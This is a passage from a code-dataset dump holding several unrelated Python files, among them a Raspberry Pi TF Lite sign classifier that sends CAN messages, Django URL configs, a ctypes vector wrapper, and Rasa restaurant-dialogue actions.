'').replace('.csv', '')\n\n # HACK hard-code match for economics scenarios against 23k dwellings scenarios\n if \"new-cities\" in key:\n econ_key = \"1-new-cities\"\n elif key == \"4-expansion23\":\n econ_key = \"2-expansion\"\n else:\n econ_key = key\n\n econ_filename = os.path.join(output_path, 'arc_gva__{}.csv'.format(econ_key))\n\n gvapc = process_to_per_head(pop_filename, econ_filename)\n gvapc.to_csv(\n os.path.join(output_path, 'arc_gva_per_head__{}.csv'.format(key)), index=False)\n\n\ndef process_to_per_head(pop_filename, econ_filename):\n pop = pandas.read_csv(pop_filename)\n gva = 
pandas.read_csv(econ_filename)\n\n gvapc = gva.merge(pop, on=['timestep', 'lad_uk_2016'])\n gvapc['gva_per_head'] = gvapc.gva / gvapc.population\n gvapc = gvapc[['timestep', 'lad_uk_2016', 'gva_per_head']]\n return gvapc\n\n\nif __name__ == '__main__':\n try:\n BASE_PATH = sys.argv[1]\n except:\n print(\"Usage: python {} \".format(__file__))\n exit(-1)\n\n main(BASE_PATH)\n","sub_path":"post-population.py","file_name":"post-population.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"376883817","text":"# python3\n#\n# Copyright 2019 The TensorFlow Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# https://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Example using TF Lite to classify objects with the Raspberry Pi camera.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport io\nimport time\nimport numpy as np\nimport picamera\nimport can\nfrom PIL import Image\nfrom tflite_runtime.interpreter import Interpreter\n\ndef load_labels(path):\n with open(path, 'r') as f:\n return {i: line.strip() for i, line in enumerate(f.readlines())}\n\n\ndef set_input_tensor(interpreter, image):\n tensor_index = interpreter.get_input_details()[0]['index']\n input_tensor = interpreter.tensor(tensor_index)()[0]\n input_tensor[:, :] = image\n\n\ndef classify_image(interpreter, image, top_k=1):\n \"\"\"Returns a sorted array of classification results.\"\"\"\n set_input_tensor(interpreter, image)\n interpreter.invoke()\n output_details = interpreter.get_output_details()[0]\n output = np.squeeze(interpreter.get_tensor(output_details['index']))\n\n # If the model is quantized (uint8 data), then dequantize the results\n if output_details['dtype'] == np.uint8:\n scale, zero_point = output_details['quantization']\n output = scale * (output - zero_point)\n\n ordered = np.argpartition(-output, top_k)\n return [(i, output[i]) for i in ordered[:top_k]]\n\n\ndef main():\n global prev_label_id\n tempDict = {\"1\":0,\"2\":0,\"3\":0,\"4\":0}\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument(\n '--model', help='File path of .tflite file.', required=True)\n parser.add_argument(\n '--labels', help='File path of labels file.', required=True)\n args = parser.parse_args()\n\n labels = load_labels(args.labels)\n\n interpreter = Interpreter(args.model)\n interpreter.allocate_tensors()\n _, height, width, _ = interpreter.get_input_details()[0]['shape']\n \n print(height,width)\n frame = 0\n with picamera.PiCamera(resolution=(640, 320), framerate=30) as camera: ### (640,480) -> (640,320)\n camera.start_preview()\n try:\n stream = io.BytesIO()\n count = 0\n for _ in camera.capture_continuous(\n stream, format='jpeg', use_video_port=True):\n stream.seek(0)\n image = Image.open(stream).convert('RGB').resize((width, height),\n Image.ANTIALIAS)\n #if frame % 2 != 0:\n # continue\n start_time = 
time.time()\n results = classify_image(interpreter, image)\n elapsed_ms = (time.time() - start_time) * 1000\n label_id, prob = results[0]\n if prob < 0.5:\n label_id = 4\n tempDict[str(label_id)] +=1\n if(count == 10):\n tempMax = max(tempDict.items())\n for index in tempDict.keys():\n if (tempDict[index] == tempMax):\n canSend(int(index))\n count = 0\n tempDict = {\"1\":0,\"2\":0,\"3\":0,\"4\":0}\n ################### LABEL_ID 0,1,2,3,4 --> 40limit, 40-nolimit, cross, stop, zbackground \n \n print(labels[label_id], label_id, prob,elapsed_ms)\n stream.seek(0)\n stream.truncate()\n camera.annotate_text = '%s %d %.2f\\n%.1fms' % (labels[label_id], label_id, prob,\n elapsed_ms)\n count+=1\n finally:\n camera.stop_preview()\n\ndef canSend(label_id):\n messageCAN = [0,0,0,0,0,0,0,0]\n #if(label_id != prev_label_id):\n messageCAN[2] = label_id\n bus = can.interface.Bus(bustype='socketcan',\n channel='can0',\n bitrate=500000)\n #CAN ID 0x2A = 42\n message = can.Message(arbitration_id=42, data=messageCAN)\n bus.send(message)\n prev_label_id = label_id\n time.sleep(1)\nif __name__ == '__main__':\n main()\n","sub_path":"classify_picamera.py","file_name":"classify_picamera.py","file_ext":"py","file_size_in_byte":4353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"628242049","text":"\nfrom django.conf.urls import patterns, url\nfrom Pac import views\n\nurlpatterns = patterns('',\n\turl(r'^$', views.IndexView.as_view(), name='index'),\n\turl(r'^press/', views.PressView.as_view(), name='press'),\n\turl(r'^press-release/(?P[-\\w]+)/$', views.PressDetailView.as_view(), name=\"press-detail\"),\n\turl(r'^thanks/', views.ThanksView.as_view(), name='thanks'),\n\turl(r'^terms-and-conditions/', views.TermView.as_view(), name='terms'),\n\turl(r'^contact/', views.ContactView.as_view(), name='contact'),\n\t)","sub_path":"Pac/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"26787002","text":"from ctypes import *\r\nfrom ctypes_wrap import *\r\n\r\nclass cVector:\r\n def __init__(self, p, dim=None, offset=0, vector=None):\r\n self.freed = False\r\n self.p = p \r\n if vector != None and type(vector) != list:\r\n self.dimension = vector.contents.dimension\r\n self.c_list_type = c_uint * self.dimension\r\n self.vector = vector\r\n return\r\n \r\n if type(vector) == list:\r\n dim = len(vector)\r\n\r\n self.dimension = dim\r\n self.c_list_type = c_uint * self.dimension\r\n CSteenrod.initializePrime(p)\r\n self.vector = CSteenrod.Vector_construct(p, dim, offset)\r\n\r\n if type(vector) == list:\r\n self.pack(vector) \r\n\r\n def free(self):\r\n if not self.freed:\r\n CSteenrod.Vector_free(self.vector)\r\n self.freed = True\r\n\r\n def assign(self, w):\r\n CSteenrod.Vector_assign(self.vector, w.vector)\r\n \r\n def pack(self, list):\r\n if self.dimension != len(list):\r\n raise Exception(\"Wrong length.\")\r\n c_list = self.c_list_type()\r\n for i, elt in enumerate(list):\r\n c_list[i] = elt % self.p\r\n CSteenrod.Vector_pack(self.vector, c_list)\r\n\r\n def unpack(self):\r\n c_list = self.c_list_type()\r\n CSteenrod.Vector_unpack(c_list, self.vector)\r\n py_list = [None] * self.dimension\r\n for i in range(self.dimension):\r\n py_list[i] = c_list[i]\r\n return py_list \r\n \r\n def addBasisElement(self, idx, c=1):\r\n c = c % self.p\r\n CSteenrod.Vector_addBasisElement(self.vector, idx, c)\r\n\r\n def add(self, w, c=1):\r\n c = c % 
self.p\r\n CSteenrod.Vector_add(self.vector, w.vector, c)\r\n \r\n \r\n def scale(self, c):\r\n c = c % self.p\r\n CSteenrod.Vector_scale(self.vector, c)\r\n\r\n def slice(self, min, max):\r\n cSlice = CSteenrod.Vector_construct(self.p, 0, 0)\r\n CSteenrod.Vector_slice(cSlice, self.vector, min, max)\r\n slice = cVector(self.p, vector=cSlice)\r\n slice.dimension = cSlice.contents.dimension\r\n return slice\r\n\r\n def __len__(self):\r\n return self.dimension\r\n \r\n def __setitem__(self, idx, value):\r\n CSteenrod.Vector_setEntry(self.vector, idx, (value % self.p))\r\n\r\n def __getitem__(self, key):\r\n if isinstance(key, slice):\r\n #Get the start, stop, and step from the slice\r\n if(key.step != None and key.step != 1):\r\n print(key.step)\r\n raise(IndexError(\"Slice steps not equal to 1 not supported.\"))\r\n return self.slice(key.start, key.stop)\r\n elif isinstance(key, int):\r\n if key < 0 : #Handle negative indices\r\n key += len(self)\r\n if key < 0 or key >= len(self):\r\n raise(IndexError(\"The index (%d) is out of range.\"%key))\r\n return CSteenrod.Vector_getEntry(self.vector, key)\r\n else:\r\n raise TypeError(\"Invalid argument type.\")\r\n\r\n def __iter__(self):\r\n return cVector_iterator(self)\r\n\r\n\r\nclass cVector_iterator:\r\n def __init__(self, vector):\r\n self.cIterator = CSteenrod.Vector_getIterator(vector.vector)\r\n\r\n def __next__(self):\r\n if not self.cIterator.has_more:\r\n raise StopIteration\r\n result = self.cIterator.value\r\n cIterator = CSteenrod.Vector_stepIterator(self.cIterator)\r\n return result\r\n\r\n\r\nclass cMatrix:\r\n def __init__(self, p, rows, columns):\r\n self.freed = False\r\n self.p = p\r\n self.rows = rows\r\n self.columns = columns\r\n CSteenrod.initializePrime(p)\r\n self.cM = CSteenrod.Matrix_construct(p, rows, columns)\r\n \r\n def pack(self, py_M):\r\n for i in range(self.cM.contents.rows):\r\n c_packVector(self.cM.contents.matrix[i], py_M[i])\r\n\r\n def unpack(self):\r\n return [\r\n cVector(self.p, vector=self.cM.contents.matrix[i]).unpack() \r\n for i in range(self.cM.contents.rows)\r\n ]\r\n\r\n def free(self):\r\n self.freed = True\r\n CSteenrod.Matrix_free(self.cM)\r\n\r\n\r\ndef c_row_reduce(c_M):\r\n array_type = c_int * c_M.contents.columns\r\n pivots_array = array_type()\r\n CSteenrod.rowReduce(c_M, pivots_array, c_M.contents.rows)\r\n c_M.pivots = pivots_array\r\n\r\ndef vector_to_C(p, vector):\r\n c_v = cVector(p, len(vector))\r\n cVector_pack(c_v, vector)\r\n return c_v\r\n\r\ndef matrix_to_C(p, matrix):\r\n rows = len(matrix)\r\n columns = len(matrix[0])\r\n c_M = cMatrix_construct(p, rows, columns)\r\n cMatrix_pack(c_M, matrix)\r\n return c_M\r\n\r\ndef matrix_from_C(matrix):\r\n return cMatrix_unpack(matrix)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n p = 2\r\n dim = 14\r\n\r\n \r\n \r\n \r\n\r\n","sub_path":"python/CWrappers/cFpVector.py","file_name":"cFpVector.py","file_ext":"py","file_size_in_byte":4795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"208854985","text":"from rasa_core.actions import Action\nfrom rasa_core.events import SlotSet\nfrom data.database import BabiDB, NOT_PREFIX\nfrom main import BABI_PATH\nfrom os.path import join\nimport logging\nfrom numpy.random import choice, seed\nfrom main import DSTC2_ONTOLOGY_FILE\nimport json\n\nseed(42)\ndb = BabiDB(babi_kb=join(BABI_PATH, 'dialog-babi-task6-dstc2-kb.txt'))\nlogger = logging.getLogger(__name__)\n\nwith open(DSTC2_ONTOLOGY_FILE, 'r') as ontology_handler:\n ontology = 
json.load(ontology_handler)['informable']\nfor informable in ontology:\n ontology[informable].append('dontcare')\n\n\ndef _produce_no_more_options_message(filters):\n filter_names = set(filters.keys())\n if filter_names == {'food'}:\n message = 'I am sorry but there is no other {food} restaurant that matches your request'.format(\n food=filters['food'])\n elif filter_names == {'food', 'pricerange'}:\n message = 'I am sorry but there is no other {food} restaurant in the {pricerange} price range'.format(\n food=filters['food'], pricerange=filters['pricerange'])\n elif filter_names == {'food', 'area'}:\n message = 'I am sorry but there is no other {food} restaurant in the {area} of town'.format(\n food=filters['food'], area=filters['area'])\n else:\n logger.warning('tried to produce message, but encountered unknown filter combination: {}'.\n format(filter_names))\n message = 'I am sorry but there is no other restaurant that matches your request'\n return message\n\n\ndef _produce_unsuccessful_search_message(filters):\n \"\"\"\n Builds the right 'no results found' sentence used in bAbI t6 which depends on the filters provided\n :param filters: dictionary mapping slot names to their value\n :return: message as a string\n \"\"\"\n filter_names = set(filters.keys())\n if filter_names == {'food'}:\n message = 'I\\'m sorry but there is no restaurant serving {food} food'.format(food=filters['food'])\n elif filter_names == {'food', 'area'}:\n message = 'I\\'m sorry but there is no {food} restaurant in the {area} of town'.format(food=filters['food'],\n area=filters['area'])\n elif filter_names == {'pricerange', 'food'}:\n message = 'I\\'m sorry but there is no restaurant serving {pricerange} {food} food'.format(\n pricerange=filters['pricerange'], food=filters['food'])\n elif filter_names == {'food', 'area'}:\n message = 'I\\'m sorry but there is no {food} restaurant in the {area} of town'.format(\n food=filters['food'], area=filters['area']\n )\n else:\n logger.info('unknown filter combination when producing unsuccess message: {}'.format(filter_names))\n message = 'no options available with the provided requirements'\n return message\n\n\ndef _produce_offer_restaurant_message(filters, name):\n filter_names = set(filters.keys())\n if filter_names == {'area', 'pricerange'}:\n message = '{name} is a nice place in the {area} of town and the prices are {pricerange}'.format(\n name=name,\n area=filters['area'],\n pricerange=filters['pricerange'])\n elif filter_names == {'area', 'food'}:\n message = '{name} is a nice place in the {area} of town serving tasty {food} food'.format(\n name=name, area=filters['area'], food=filters['food']\n )\n elif filter_names == {'area', 'food', 'pricerange'}:\n message = '{name} is a great restaurant serving {pricerange} {food} food in the {area} of town'.format(\n name=name, pricerange=filters['pricerange'], food=filters['food'], area=filters['area']\n )\n else:\n logger.info('unknown filter combination when producing offer restaurant message: {}'.format(filter_names))\n message = 'how about restaurant {name}?'.format(name=name)\n return message\n\n\ndef _build_request_answer(tracker, requested_entities):\n if tracker.current_slot_values()['last_offer_index'] is not None and \\\n tracker.current_slot_values()['results'] is not None:\n rest = tracker.current_slot_values()['results'].iloc[tracker.current_slot_values()['last_offer_index']]\n message = []\n if 'address' in requested_entities:\n message.append('Sure , {name} is on {address}'.format(name=rest['name'], 
address=rest['address']))\n if 'phone' in requested_entities:\n message.append('The phone number of {name} is {phone}'.format(name=rest['name'], phone=rest['phone']))\n if 'pricerange' in requested_entities:\n message.append('{name} is in the {pricerange} price range'.format(name=rest['name'],\n pricerange=rest['pricerange']))\n if 'food' in requested_entities:\n message.append('{name} serves {food} food'.format(name=rest['name'], food=rest['food']))\n if 'postcode' in requested_entities:\n message.append('The post code of {name} is {postcode}'.format(name=rest['name'], postcode=rest['postcode']))\n if len({'area', 'name', 'signature'} & set(requested_entities.keys())) > 0:\n logger.warning('detected request with non requestable entities: {}, input: {}'.format(requested_entities),\n tracker.latest_message.text)\n message = '. '.join(message)\n else:\n message = 'which restaurant are you talking about?'\n return message\n\n\ndef _search_and_inform(tracker, dispatcher):\n def search():\n results = db.find_restaurant(**filters)\n if len(results) == 0:\n message = _produce_unsuccessful_search_message(filters)\n else:\n message = _produce_offer_restaurant_message(filters, results.iloc[0]['name'])\n dispatcher.utter_message(message)\n return results\n\n filters = {var: value for var, value in tracker.current_slot_values().items() if\n var in ['food', 'pricerange', 'area'] and value not in [None, 'dontcare']}\n user_intent = tracker.latest_message.intent['name']\n if user_intent == 'request':\n requested_entities = {e['entity']: e['value'] for e in tracker.latest_message.entities}\n message = _build_request_answer(tracker, requested_entities)\n dispatcher.utter_message(message)\n return []\n elif user_intent == 'deny':\n # there are only 2 deny examples in training data, so it is unlikely we ever fall here in testing\n denied_entity = tracker.latest_message.entities[0]['entity']\n denied_value = tracker.latest_message.entities[0]['value']\n logger.info('processing a deny')\n filters[denied_entity] = NOT_PREFIX + denied_value\n results = search()\n return [SlotSet(\"results\", results if len(results) > 0 else None),\n SlotSet(\"last_offer_index\", 0 if len(results) > 0 else None)]\n elif user_intent == 'inform_dontcare':\n current_slot = tracker.current_slot_values()['current_slot']\n if current_slot in filters:\n del filters[current_slot]\n results = search()\n return [SlotSet(\"results\", results if len(results) > 0 else None),\n SlotSet(\"last_offer_index\", 0 if len(results) > 0 else None)]\n elif user_intent == 'query':\n results = search()\n requested_entities = {e['entity']: e['value'] for e in tracker.latest_message.entities\n if e['entity'] not in ['food', 'area', 'pricerange']}\n if len(requested_entities) == 0:\n logger.warning('tried to perform query da, but all slots were informable')\n results = search()\n return [SlotSet(\"results\", results if len(results) > 0 else None),\n SlotSet(\"last_offer_index\", 0 if len(results) > 0 else None)]\n else:\n message = _build_request_answer(tracker, requested_entities)\n dispatcher.utter_message(message)\n return [SlotSet(\"results\", results if len(results) > 0 else None),\n SlotSet(\"last_offer_index\", 0 if len(results) > 0 else None)]\n elif user_intent == 'reqalts':\n results = tracker.current_slot_values()['results']\n if results is not None:\n current_index = tracker.current_slot_values()['last_offer_index'] + 1\n if current_index < len(results):\n message = _produce_offer_restaurant_message(filters, 
results.iloc[current_index]['name'])\n dispatcher.utter_message(message)\n return [SlotSet(\"last_offer_index\", current_index)]\n else:\n message = _produce_no_more_options_message(filters)\n dispatcher.utter_message(message)\n return [SlotSet(\"last_offer_index\", current_index - 1)]\n else:\n logger('user uttered reqalts when no results were available')\n message = 'What type of restaurant are you looking for?'\n dispatcher.utter_message(message)\n return []\n else:\n if user_intent not in ['inform', 'include_filter']:\n logger.warning('tried to perform a restaurant search with unexpected da: {}'.format(user_intent))\n results = search()\n return [SlotSet(\"results\", results if len(results) > 0 else None),\n SlotSet(\"last_offer_index\", 0 if len(results) > 0 else None)]\n\n\nclass ActionCantHelp(Action):\n def name(self):\n return 'canthelp'\n\n def run(self, dispatcher, tracker, domain):\n return _search_and_inform(tracker=tracker, dispatcher=dispatcher)\n\n\nclass ActionOffer(Action):\n def name(self):\n return 'offer'\n\n def run(self, dispatcher, tracker, domain):\n return _search_and_inform(tracker=tracker, dispatcher=dispatcher)\n\n\nclass ActionOfferDetailed(Action):\n def name(self):\n return 'offer_detailed'\n\n def run(self, dispatcher, tracker, domain):\n return _search_and_inform(tracker=tracker, dispatcher=dispatcher)\n\n\nclass ActionExplConf(Action):\n def name(self):\n return 'expl-conf'\n\n def run(self, dispatcher, tracker, domain):\n \"\"\"Which field to ask for is very random. Often the bot asks about the value that the human just provided on its\n previous utterance, but this is not guaranteed. So we'll simply pick a random filled slot and ask about it\n \"\"\"\n filters = {var: value for var, value in tracker.current_slot_values().items() if\n var in ['food', 'pricerange', 'area'] and value is not None}\n selected_slot = choice(list(filters.keys()))\n value = filters[selected_slot]\n if selected_slot == 'food':\n if value == 'dontcare':\n message = choice(\n ['You are looking for a restaurant serving any kind of food right?'])\n else:\n message = 'You are looking for a {} restaurant right?'.format(value)\n elif selected_slot == 'pricerange':\n if value == 'dontcare':\n message = 'Let me confirm , You are looking for a restaurant and you dont care about the price range ' \\\n 'right?'\n else:\n message = 'Let me confirm , You are looking for a restaurant in the {} price range right?'.format(value)\n elif selected_slot == 'area':\n if value == 'dontcare':\n message = 'Ok , a restaurant in any part of town is that right?'\n else:\n message = 'Did you say you are looking for a restaurant in the {area} of town?'.format(area=value)\n dispatcher.utter_message(message)\n return []\n\n\nclass ActionSelect(Action):\n def name(self):\n return 'select'\n\n def run(self, dispatcher, tracker, domain):\n unset_slots = [var for var, value in tracker.current_slot_values().items() if\n var in ['food', 'pricerange', 'area'] and value is None]\n if len(unset_slots) > 0:\n selected_slot = choice(unset_slots)\n value1, value2 = choice(ontology[selected_slot], size=2, replace=False)\n if selected_slot == 'food':\n if 'dontcare' in [value1, value2]:\n other_value = value1 if value2 == 'dontcare' else value2\n message = 'Sorry would you like {} food or you dont care'.format(other_value)\n else:\n message = 'Sorry would you like {} or {} food'.format(value1, value2)\n elif selected_slot == 'pricerange':\n if 'dontcare' in [value1, value2]:\n other_value = value1 if value2 == 'dontcare' 
else value2\n message = 'Sorry would you like something in the {} price range or you dont care'.format(\n other_value)\n else:\n message = 'Sorry would you like something in the {} price range or in the {} price range'.format(\n value1, value2)\n else: # selected_slot == 'area':\n if 'dontcare' in [value1, value2]:\n other_value = value1 if value2 == 'dontcare' else value2\n message = 'Sorry would you like the {} of town or you dont care'.format(other_value)\n else:\n message = 'Sorry would you like something in the {} or in the {}'.format(value1, value2)\n dispatcher.utter_message(message)\n return [SlotSet(\"current_slot\", selected_slot)]\n else:\n logger.warning('bot predicted ActionSelect, but there are no currently unset slots')\n return _search_and_inform(tracker=tracker, dispatcher=dispatcher)\n\n\nclass ActionRequestAreaDetailed(Action):\n def name(self):\n return 'request_area_detailed'\n\n def run(self, dispatcher, tracker, domain):\n \"\"\"The bot affirms there are available options with the provided slots, and then requests the value of\n area. Calling this action when area is already set is a mistake that will be logged but area will be\n requested anyway\"\"\"\n filters = {var: value for var, value in tracker.current_slot_values().items() if\n var in ['food', 'pricerange', 'area'] and value is not None}\n if 'area' in filters:\n logger.warning('bot predicted request_area_detailed, but the area is already set. Uttering it anyway')\n del filters['area']\n num_results = db.num_results(**filters)\n other_slots = {s for s in filters}\n if other_slots == {'food'}:\n if filters['food'] == 'dontcare':\n message = \"There are {} restaurants if you don't care about the food . What area do you want?\".format(\n num_results)\n else:\n message = 'There are {} restaurants serving {} food . What area do you want?'.format(num_results,\n filters['food'])\n elif other_slots == {'pricerange'}:\n if filters['pricerange'] == 'dontcare': # never observed in test data\n message = \"There are {} restaurants if you don't care about the price range . What area do you want?\".\\\n format(num_results)\n else:\n message = 'There are {} restaurants in the {} price range . What area do you want?'.format(\n num_results, filters['pricerange'])\n elif other_slots == {'food', 'pricerange'}:\n food, pricerange = filters['food'], filters['pricerange']\n if food == 'dontcare' and pricerange == 'dontcare': # never observed\n message = 'There are {} restaurants if you don\\'t care about the food in any price range . ' \\\n 'What area would you like?'.format(num_results)\n elif food == 'dontcare' and pricerange != 'dontcare': # never observed\n message = 'There are {} restaurants if you don\\'t care about the food in the {} price range . ' \\\n 'What area would you like?'.format(num_results, pricerange)\n elif food != 'dontcare' and pricerange == 'dontcare':\n message = 'There are {} restaurants serving {} in any price range . What area would you like?'.\\\n format(num_results, food)\n elif food != 'dontcare' and pricerange != 'dontcare':\n message = 'There are {} restaurants serving {} in the {} price range . 
What area would you like?'.\\\n format(num_results, food, pricerange)\n else:\n raise ValueError('Unknown combination of other slots when processing ActionRequestAreaDetailed: {}'.format(\n other_slots))\n dispatcher.utter_message(message)\n return [SlotSet(\"current_slot\", 'area')]\n\n\nclass ActionRequestFoodDetailed(Action):\n def name(self):\n return 'request_food_detailed'\n\n def run(self, dispatcher, tracker, domain):\n filters = {var: value for var, value in tracker.current_slot_values().items() if\n var in ['food', 'pricerange', 'area'] and value is not None}\n if 'food' in filters:\n logger.warning('bot predicted request_food_detailed, but the food is already set. Uttering it anyway')\n del filters['food']\n num_results = db.num_results(**filters)\n other_slots = {s for s in filters}\n if other_slots == {'area'}:\n if filters['area'] == 'dontcare':\n message = 'There are {} restaurants in all parts of town . What type of food do you want?'.format(\n num_results)\n else:\n message = 'There are {} restaurants in the {} of town . What type of food do you want?'.format(\n num_results, filters['area'])\n elif other_slots == {'pricerange'}:\n if filters['pricerange'] == 'dontcare':\n message = 'There are restaurants if you don\\'t care about the price range . What type of food do ' \\\n 'you want?' # never observed in trn/dev/tst\n else:\n message = 'There are {} restaurants in the {} price range . What type of food do you want?'.format(\n num_results, filters['pricerange'])\n elif other_slots == {'area', 'pricerange'}:\n area, pricerange = filters['area'], filters['pricerange']\n if area == 'dontcare' and pricerange == 'dontcare':\n message = 'There are restaurants if you don\\'t care about the price range or area . What type of ' \\\n 'food do you want?' # never observed in trn/dev/tst\n elif area == 'dontcare' and pricerange != 'dontcare':\n message = 'There are restaurants in all parts of town in the {} price range . What type of food do ' \\\n 'you want?'.format(pricerange)\n elif area != 'dontcare' and pricerange == 'dontcare':\n pass # TODO\n elif area != 'dontcare' and pricerange != 'dontcare':\n message = 'There are {} restaurants in the {} price range and the {} of town . What type of food ' \\\n 'would you like?'.format(num_results, pricerange, area)\n else:\n raise ValueError('Unknown combination of other slots when processing ActionRequestAreaDetailed: {}'.format(\n other_slots))\n dispatcher.utter_message(message)\n return [SlotSet(\"current_slot\", 'food')]\n\n\nclass ActionRequestPricerangeDetailed(Action):\n def name(self):\n return 'request_pricerange_detailed'\n\n def run(self, dispatcher, tracker, domain):\n filters = {var: value for var, value in tracker.current_slot_values().items() if\n var in ['food', 'pricerange', 'area'] and value is not None}\n if 'pricerange' in filters:\n logger.warning('bot predicted request_pricerange_detailed, but the food is already set. Uttering it anyway')\n del filters['pricerange']\n num_results = db.num_results(**filters)\n other_slots = {s for s in filters}\n if other_slots == {'area'}:\n if filters['area'] == 'dontcare':\n message = 'There are {} restaurants in all parts of town . What type of pricerange do you want?'.format(\n num_results)\n else:\n pass # TODO\n elif other_slots == {'food'}:\n if filters['food'] == 'dontcare':\n message = 'There are {} restaurants if you don\\'t care about the food . What price range do you want?'.\\\n format(num_results)\n else:\n message = 'There are {} restaurants serving {} food . 
What price range do you want?'.format(\n num_results, filters['food'])\n elif other_slots == {'area', 'food'}:\n area, food = filters['area'], filters['food']\n if area == 'dontcare' and food == 'dontcare':\n message = 'There are {} restaurants if you don\\'t care about the area or the type of food . What ' \\\n 'price range would you like?'.format(num_results)\n elif area == 'dontcare' and food != 'dontcare':\n message = 'There are {} restaurants serving {} food in any part of town . What price range would you'\n ' like?'.format(num_results, food)\n elif area != 'dontcare' and food == 'dontcare':\n message = 'There are {} restaurants in the {} of town serving any kind of food . What price range ' \\\n 'would you like?'.format(num_results, area)\n elif area != 'dontcare' and food != 'dontcare':\n message = 'There are {} restaurants serving {} in the {} of town . What price range would you like?'.\\\n format(num_results, food, area)\n else:\n raise ValueError('Unknown combination of other slots when processing ActionRequestAreaDetailed: {}'.format(\n other_slots))\n dispatcher.utter_message(message)\n return [SlotSet(\"current_slot\", 'pricerange')]\n","sub_path":"babi_dstc2trained/fabot/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":22308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"495368537","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('covid', '0013_chatuser_state'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='chatuser',\n name='state',\n field=models.IntegerField(default=-1, null=True, blank=True),\n ),\n ]\n","sub_path":"django-api/covid/migrations/0014_auto_20200424_2012.py","file_name":"0014_auto_20200424_2012.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141836504","text":"from __future__ import print_function\nimport os, fnmatch, datetime, sys, re, math\nimport helper as helper\n\ntop = sys.argv[1]\nsch = sys.argv[2]\nst = sys.argv[3] if len(sys.argv) > 3 else \"unbuf\"\n\n\nbuildDir=top+\"/_build/\"+sch\nif st == \"buf\":\n\tftemp = helper.fileOpen(buildDir+\"/\"+top+\"_graph_buf.dot\")\nelif sch == \"dss\":\n\tftemp = helper.fileOpen(buildDir+\"/ds_\"+top+\"/\"+top+\".dot\")\nelse:\n\tftemp = helper.fileOpen(buildDir+\"/\"+top+\".dot\")\n\nbuf=[]\nfor line in ftemp:\n\tbuf.append(line)\nftemp.close()\n\nif st == \"buf\":\n\tftemp = helper.fileOpen(buildDir+\"/\"+top+\"_bbgraph_buf.dot\")\nelif sch == \"dss\":\n\tftemp = helper.fileOpen(buildDir+\"/ds_\"+top+\"/\"+top+\"_bbgraph.dot\")\nelse:\n\tftemp = helper.fileOpen(buildDir+\"/\"+top+\"_bbgraph.dot\")\n\nbufBB = []\nfor line in ftemp:\n\tbufBB.append(line)\nftemp.close()\n\ncheck = True\nfor line in buf:\n\tif \"bbID= 1,\" in line:\n\t\tcheck = False\n\nif check:\n\thelper.warning(\"Warning: bb offset found for benchmark \"+top+\". 
Fixing...\")\n\tbbMin = 0\n\tbbMax = 0\n\tfor line in buf:\n\t\tif \"bbID= \" in line:\n\t\t\tbb = helper.strFindNumber(line, \"bbID= \")\n\t\t\tbb = int(bb)\n\t\t\tif bbMax < bb and bbMax == 0: bbMin = bb\n\t\t\tif bbMax < bb: bbMax = bb\n\tprint(\"BB = 0+\"+str(bbMin) + \" - \"+ str(bbMax))\n\tbb = bbMin\n\ti = 1\n\twhile (bb <= bbMax):\n\t\tbufBB = [w.replace(\"block\"+str(bb), \"block\"+str(i)) for w in bufBB]\n\t\tbuf = [w.replace(\"bbID= \"+str(bb), \"bbID= \"+str(i)) for w in buf]\n\t\ti = i + 1\n\t\tbb = bb + 1\n\tprint(\"Now BB = 0 - \"+ str(i-1))\n\tif st == \"buf\":\n\t\tos.system(\"mv \"+buildDir+\"/\"+top+\"_graph_buf.dot \"+buildDir+\"/\"+top+\"_graph_buf.dot_\")\n\t\tos.system(\"mv \"+buildDir+\"/\"+top+\"_bbgraph_buf.dot \"+buildDir+\"/\"+top+\"_bbgraph_buf.dot_\")\n\telse:\n\t\tos.system(\"mv \"+buildDir+\"/\"+top+\".dot \"+buildDir+\"/\"+top+\".dot_\")\n\t\tos.system(\"mv \"+buildDir+\"/\"+top+\"_bbgraph.dot \"+buildDir+\"/\"+top+\"_bbgraph.dot_\")\n\tif st == \"buf\":\n\t\tftemp = open(buildDir+\"/\"+top+\"_graph_buf.dot\", \"w\")\n\telse:\n\t\tftemp=open(buildDir+\"/\"+top+\".dot\", \"w\")\n\tfor line in buf:\n\t\tftemp.write(line)\n\tftemp.close()\n\tif st == \"buf\":\n\t\tftemp = open(buildDir+\"/\"+top+\"_bbgraph_buf.dot\", \"w\")\n\telse:\n\t\tftemp=open(buildDir+\"/\"+top+\"_bbgraph.dot\", \"w\")\n\tfirst = True\n\tfor line in bufBB:\n\t\tif first and \"block\" in line:\n\t\t\tbb = helper.strFindNumber(line, \"block\")\n\t\t\tbb = int(bb)\n\t\t\ti = 1\n\t\t\twhile (i < bb):\n\t\t\t\tftemp.write(\"\\\"block\"+str(i)+\"\\\";\\n\")\n\t\t\t\ti = i + 1\n\t\t\tfirst = 